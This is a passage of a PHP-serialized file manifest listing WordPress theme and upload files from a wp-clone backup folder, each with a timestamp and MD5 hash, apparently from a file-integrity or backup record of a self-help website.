6c2e5981ce5a387e58cfa7";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/search.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d8af7665469040a0b7310481610801c2";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/searchform.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"82db8fd49b68a57525d03ebcd700235e";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/sidebar-content-bottom.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"2b24f15644973caa9e3a7417f82a4132";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/sidebar.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"eac298afb626b7030f15a3fa49eb7e72";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/single.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"a0fa3eb0573b6f5d1eb355a36f6c7e50";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"705a4faa4696284cf35c535b7b069879";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/biography.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"3c5d5fd7a8b480cb6f83754e07814292";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/content-none.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"782006598d42a9b76a9fb8be8479f6a5";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/content-page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7345d516801b45cb172ab81cc6d7c8b7";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/content-search.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"077d4139a0d0ce6c0b7f7ffc630a4f57";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/content-single.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"df63599ec46fe84c1d78e2edfa967746";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentysixteen/template-parts/content.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"828b24e78ef32f733d4eb09c0e9eb0e6";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/404.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"53c49f5294ae24d2796ad73b82db1954";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/archive.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f9aa15ac01474b1657cc50aa6b8d54b4";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/author-bio.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f337b5d28421e7ad1792f194ca15d421";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/author.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d66de39b9656dcffadfcfeff703b02bf";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/category.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7c011f4e3624a1d4bef1a8959561640d";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/comments.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9fc2dfc9bae61ff303e5e5ba96830b34";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-aside.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d8b12eb9998cde79acb9cc6ae3e647b5";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-audio.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"12a145e7dfcc3c63479cbdbf1d03140d";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-chat.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"22e12017d5533e1a3329de62e831c809";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-gallery.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"ba2c7ce5a3d288dc391cd440bc0224b7";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-image.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"1ef65c5e04ee40bdbc6d73cd15d578c0";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-link.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b15f854ebf7711ffb4c1cf2839ba77a3";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-none.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"bb7a03107ec589885fc42df7bc839e0d";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-quote.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"aa3ba38e52eb57e5866bb0ff6c88d397";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-status.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"e30f3a7bab4930977f62f34ce519854b";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content-video.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b1784295b00d1ae595ce9164004ce4b1";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/content.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"63a5c16d7962e503172f0522c973d7cf";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/css/editor-style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"ee4e3d326c58ca68a585902c0d264cc0";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/css/ie.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"2fb62d927452a89f691b2e6dbb8bbe95";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/footer.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"e16fba862d7ffb9954bb54a8ea6bf96f";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/functions.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"45026bf5f51a5049f8a2f1e17841ee37";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/COPYING.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b9423b96eb6160477fd4a2b7de890419";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/Genericons-Regular.otf";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d131056b90b61a4ed8d82b883e148411";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/LICENSE.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b234ee4d69f5fce4486a80fdaf4a4263";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/README.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"4923271c0e79b5a346a440b9c0c76422";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/font/genericons-regular-webfont.eot";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"adf093b1ec7239c03865a87ae6d60160";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/font/genericons-regular-webfont.svg";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"da07151366f79da6116cf5cfc3cc477b";}s:122:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/font/genericons-regular-webfont.ttf";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f83f27fb1bfd20d64ba2ae3eaaf4b1ca";}s:123:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/font/genericons-regular-webfont.woff";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"db7a8d16b367e4c38591be6d7e979876";}s:101:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/genericons/genericons.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"8604c201ca1b346289d82daf2b6c91f6";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/header.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7cc038bfe5c979a3fdaae079de5977be";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/image.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"eba3aa7f77029504d1f89aaafeccabd6";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/inc/back-compat.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"a7d8955a04266243fb256dffdf04ccc9";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/inc/custom-header.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"321fecd2dcb15263929da5277523fc3e";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/index.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"e05e6582dcbc97f80e32c5cd8a220f5a";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/js/functions.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"991f00aa95d6cb3eedc640949d8d97e7";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/js/html5.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5a98a86b5cb48c1506f338463259ce41";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/js/theme-customizer.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"37b882b9e5354553532455391abbed99";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"1caa91f8b46fef4769aeb0730f6e296d";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/readme.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"3b2ff2d478fe4cf7463f161d32f99ce9";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/rtl.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b04dfa79c65c8548a33491858796851a";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/search.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"c39c41ae64a1706ef9fde6c4bcb0092b";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/sidebar-main.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d01299c558225fb73b93732ff22a1278";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/sidebar.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"6e130e18b6ce4b832b4de648255e67b2";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/single.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7134abae3a441877786af588682ade96";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"7dd6e197a699b38490565ff486f92380";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/tag.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"e3b51ba664d3d11cb58013c14cda529d";}s:100:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentythirteen/taxonomy-post_format.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"2e8026dbd6a4724e14eefdbfa5ac171b";}s:81:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/404.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5f3b1db7c4b813dc9aeae491e905d60c";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/archive.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"753209dbbc417869ea63b5676b59cdd0";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/author.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9a421445b926d642be24ccc29ad56555";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/category.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"bccc481149575f7a6a4f1ed524064d3b";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/comments.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"382aaacbb8945e1f619bb8f4127d1f36";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-aside.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9c6c926c48c6b54faff460f014fbc6d9";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-image.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"cc039e8175385e5043dc843e80be89d6";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-link.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f2703ed025d42f4e8bd71e83e4d5cce3";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-none.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"a033a9f07bd307c263d8b0c4d09ae1ae";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"ee3264ac0116a8d567b074ba04431c63";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-quote.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"71f6d8e450d5b9df561b187a39a52d8a";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content-status.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9b06c6385cc65aaabb01a81d30372634";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/content.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"9572c09bcd32157984f9c45f38911a59";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/css/ie.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"000f80a506285a81e8918f3628b6cd42";}s:94:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/editor-style-rtl.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"61d8efcd612edfdb3dccb1f49dd4252d";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/editor-style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"01d3b7dcd5727649421af9760e7f10af";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/footer.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"07df7effeff9b02b5f2a74014a607da0";}s:87:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/functions.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5a2a6895c1e0127a55f3bfaaf8648ad1";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/header.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"fa9709704a5a0d2c7ec05d5616e014a8";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/image.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b4dcb6c25178bae6f40758bff1eac56a";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/inc/custom-header.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"3ef28297adbe6d289327d7a5c038ab03";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/index.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"cfc06cfa76f7f4b0e313f45903dfd9f0";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/js/html5.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"5a98a86b5cb48c1506f338463259ce41";}s:90:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/js/navigation.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"6e26dcae5f37cd7dbc99443304d0d4b6";}s:96:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/js/theme-customizer.js";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f823aaea4b8a2d194d640bfec6a9ac84";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/page-templates/front-page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"d75ec4f8c7e61e100e2686d95b5a8307";}s:103:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/page-templates/full-width.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"994ee4d57dcfae4e7eab8e22c5506174";}s:82:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/page.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"37f87edd55a4e19af3f8afa5f0268e7d";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/readme.txt";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"da3e1d4b27797a2075a80deb5b0e3063";}s:81:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/rtl.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f84fa5a78fc91bd73a2b346c1cecb233";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/search.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"39b1c66730c70d61935a6b96c9322be1";}s:91:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/sidebar-front.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"6bbfbb2cf89e018105e114b3ba92dfb5";}s:85:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/sidebar.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"0bc8419ae99670186b7c71878841bcdf";}s:84:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/single.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"f2a66b8fb79d1c17b0dd60d4969636f0";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/style.css";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"781be46768c04ee1319807c01fcc85c0";}s:81:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/themes/twentytwelve/tag.php";a:2:{s:1:"d";i:1517159308;s:1:"h";s:32:"b71f6d1eacd3aea2f9e463cc19530742";}s:111:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/Belief-Self-Diagnosis-Exercise-2013.2.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"459d3b74e43a5ec36efd7f6b1bebdcb9";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-1.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"67ebecc613430d558a6a0dffb011dcfe";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-2.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"8b217060a581751881a397417c295dde";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-3.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"51484fa0fc05dff40e6fb54bc6aa3cbe";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-4.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"75d19918907d12d51fa197438a411f32";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-5.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"2a987988205f1db2cdd8355a9c18705c";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-6.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"b0c4d879457b53437bc117e3b9e63a57";}s:79:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-7.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"39d542d45f490b187f414694fe85dd6e";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.2.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"129023e008cd54bf827ced9bf373d14a";}s:116:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"035b25f0016f307364be2746143719ce";}s:113:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"a09962a1230967ad7335ec1848e63777";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"d0a095b47798df5766bfee42c5c59d5c";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"c781ce1cc65b7376e720297034e5c8c9";}s:108:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/Creating_On_Purpose_SampleChapters.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"16c050d4308a3b815ac85b53449b2086";}s:106:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/03/The-Clear-Your-Beliefs-Guidebook.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"2bd24c4629484a710a65e65430e379ca";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/04/TYB-final-Cover.pdf";a:2:{s:1:"d";i:1517159309;s:1:"h";s:32:"4f4a2b4bb6bc469c84a30a117c45efde";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/05/211x211-150x150.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"40b3aea204e15c07e997801f9936197c";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/05/211x211-170x200.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"6ebee7205f372c5ae328c09e38131f22";}s:81:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/05/211x211.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"9c5ef2144eb372a6ddffae0d77ade166";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider-150x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"ddb87dcb13d3b76c2fdd6e612d0b326a";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider-170x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"12936e5b2420ef9d02423bf24b28a804";}s:88:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider-220x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"722063f89a4e7b1d2b14966406cf345d";}s:81:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"692bcd47a86d5b25445461bb28d729f1";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider1-150x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"ddb87dcb13d3b76c2fdd6e612d0b326a";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider1-170x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"12936e5b2420ef9d02423bf24b28a804";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider1-220x17.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"722063f89a4e7b1d2b14966406cf345d";}s:82:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/06/divider1.gif";a:2:{s:1:"d";i:1517159310;s:1:"h";s:32:"692bcd47a86d5b25445461bb28d729f1";}s:109:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip.mp3";a:2:{s:1:"d";i:1517159312;s:1:"h";s:32:"cd150083cef69fb99cb52f36163ff52d";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip1.mp3";a:2:{s:1:"d";i:1517159312;s:1:"h";s:32:"cd150083cef69fb99cb52f36163ff52d";}s:110:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/1-Clear-Your-Beliefs-01-10-min-clip2.mp3";a:2:{s:1:"d";i:1517159312;s:1:"h";s:32:"cd150083cef69fb99cb52f36163ff52d";}s:95:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/CYB-AFFILIATE-OPTIONS.pdf";a:2:{s:1:"d";i:1517159312;s:1:"h";s:32:"16ce3a514f1d82dccdc2d80b2d24b7d3";}s:115:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/Clear-Your-Beliefs-Announcement-8-4-14-ed.mp3";a:2:{s:1:"d";i:1517159313;s:1:"h";s:32:"e479fad9f7a312f5c722c78f2113b15d";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/07/Hooponopono-Introduction.mp3";a:2:{s:1:"d";i:1517159313;s:1:"h";s:32:"cc80b17019e13eaea39e60d97a68e4bd";}s:86:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/BCP_goodnews.mp3";a:2:{s:1:"d";i:1517159313;s:1:"h";s:32:"05f2196bfddd8cfd908db08881f22dc7";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/JSK Video Final.mov";a:2:{s:1:"d";i:1517159317;s:1:"h";s:32:"8244a842d60ca81d45ad94384bfa5da5";}s:89:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/JSK-Video-Final.flv";a:2:{s:1:"d";i:1517159317;s:1:"h";s:32:"2cb5a60ea84a8c4116cb7129a61264c8";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/JSKvideo.webm";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"468d8f93426ec6290db87ee915ad1371";}s:83:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/JSKvideo1.mp4";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"38b044c66f0ca0cdf09612530687dbc9";}s:97:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_beneathsurface-_new.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"097eb2f4dc6c01f787bdd98097134758";}s:98:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_beneathsurface-_new1.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"097eb2f4dc6c01f787bdd98097134758";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_createfeelings.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"194ebcac16b85c14422724324579bade";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_createfeelings1.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"194ebcac16b85c14422724324579bade";}s:92:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_secretrevealed.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"d79e146ccec3920e66b0bde6a0a1c5e2";}s:93:"wp-content/uploads/wp-clone/wpclone_backup/wp-content/uploads/2014/08/bcp_secretrevealed1.mp3";a:2:{s:1:"d";i:1517159318;s:1:"h";s:32:"d79e146ccec3920e66b0bde6a0a1c5e2";}s:106: